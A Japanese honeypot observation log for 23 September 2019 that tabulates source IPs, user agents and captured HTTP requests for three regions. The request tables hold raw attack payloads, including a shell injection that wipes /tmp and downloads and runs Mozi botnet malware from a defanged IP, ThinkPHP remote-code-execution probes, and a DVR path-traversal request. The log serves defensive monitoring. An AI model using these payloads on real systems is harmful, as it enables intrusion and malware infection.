ハニーポット(仮) 観測記録 2019/09/23分です。
特徴
Region:AP
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
42[.]227[.]154[.]34に関する不正通信
を確認しました。
Region:US
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
zgrabによるスキャン行為
を確認しました。
Region:EU
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
を確認しました。
他
アクセス数推移
AP:総アクセス数:57 (前日比:+26)
US:総アクセス数:39 (前日比:-85)
EU:総アクセス数:22 (前日比:+8)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 104.248.21.85 | United States |
2 | 114.115.236.68 | China |
3 | 117.50.54.253 | China |
3 | 124.251.44.148 | China |
1 | 154.47.32.66 | United States |
1 | 159.203.197.17 | United States |
2 | 159.203.201.167 | United States |
2 | 159.203.201.204 | United States |
1 | 159.203.201.78 | United States |
1 | 171.67.70.80 | United States |
4 | 179.197.214.103 | Brazil |
1 | 185.234.218.52 | Ireland |
3 | 185.45.13.11 | Romania |
1 | 194.61.24.202 | Netherlands |
1 | 195.158.110.186 | Malta |
3 | 210.60.110.4 | Taiwan |
1 | 34.77.50.202 | United States |
1 | 35.189.254.19 | United States |
1 | 35.241.177.192 | United States |
2 | 37.210.67.16 | Qatar |
3 | 39.135.1.194 | China |
1 | 42.227.154.34 | China |
1 | 45.136.108.29 | Russia |
4 | 49.234.81.16 | China |
1 | 66.240.205.34 | United States |
1 | 66.249.69.12 | United States |
2 | 75.106.115.186 | United States |
1 | 88.5.120.250 | Spain |
1 | 92.63.194.3 | Russia |
6 | 94.141.169.68 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
15 | - |
6 | Firefox 3.1 |
1 | Go-http-client/1.1 |
1 | Hello, world |
3 | internetwache.org v3.4 |
2 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C) |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
12 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
9 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
3 | GET | /cm/ | HTTP/1.1 |
1 | GET | /epgrec/do-record.sh | HTTP/1.0 |
2 | GET | /epgrec/do-record.sh | HTTP/1.1 |
1 | GET | /foltia/ | HTTP/1.0 |
2 | GET | /foltia/ | HTTP/1.1 |
3 | GET | /.git/config | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
6 | GET | /manager/html | HTTP/1.1 |
3 | GET | /manager/text/list | HTTP/1.1 |
7 | GET | ../../mnt/custom/ProductDefinition | HTTP |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /PSIA/index | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http://42[.]227[.]154[.]34:38760/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
4 | GET | /TP/index.php | HTTP/1.1 |
4 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
4 | GET | /TP/public/index.php | HTTP/1.1 |
1 | Gh0st\xad | ||
2 | HEAD | / | HTTP/1.1 |
1 | \n | ||
1 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
2 | POST | /upgrade.aspx?a1=a51599c6 | HTTP/1.1 |
3 | \x03 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 104.248.21.85 | United States |
23 | 106.12.36.60 | China |
10 | 112.29.140.228 | China |
1 | 154.47.32.66 | United States |
1 | 159.203.201.23 | United States |
1 | 171.67.70.80 | United States |
1 | 194.61.24.202 | Netherlands |
1 | 35.195.70.238 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
3 | - |
1 | Go-http-client/1.1 |
1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C) |
23 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | |||
1 | - | ||
1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /cm/ | HTTP/1.1 |
1 | GET | /dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /db/index.php?lang=en | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /myadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /MyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
1 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
1 | GET | /pma/index.php?lang=en | HTTP/1.1 |
1 | GET | /PMA/index.php?lang=en | HTTP/1.1 |
1 | GET | /program/index.php?lang=en | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /shopdb/index.php?lang=en | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /upgrade.aspx?a1=a51599c6 | HTTP/1.1 |
1 | \x03 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 104.248.21.85 | United States |
10 | 139.199.38.56 | China |
1 | 154.47.32.66 | United States |
1 | 159.203.193.244 | United States |
1 | 159.203.201.134 | United States |
1 | 171.67.70.80 | United States |
1 | 194.61.24.202 | Netherlands |
1 | 27.155.87.45 | China |
1 | 35.195.249.233 | United States |
1 | 77.240.252.70 | Republic of Lithuania |
2 | 80.211.144.201 | Italy |
1 | 92.63.194.3 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
4 | - |
1 | Go-http-client/1.1 |
1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C) |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
3 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
3 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /cm/ | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://www[.]msftncsi[.]com/ncsi.txt | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
2 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | \n | ||
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /upgrade.aspx?a1=a51599c6 | HTTP/1.1 |
2 | \x03 |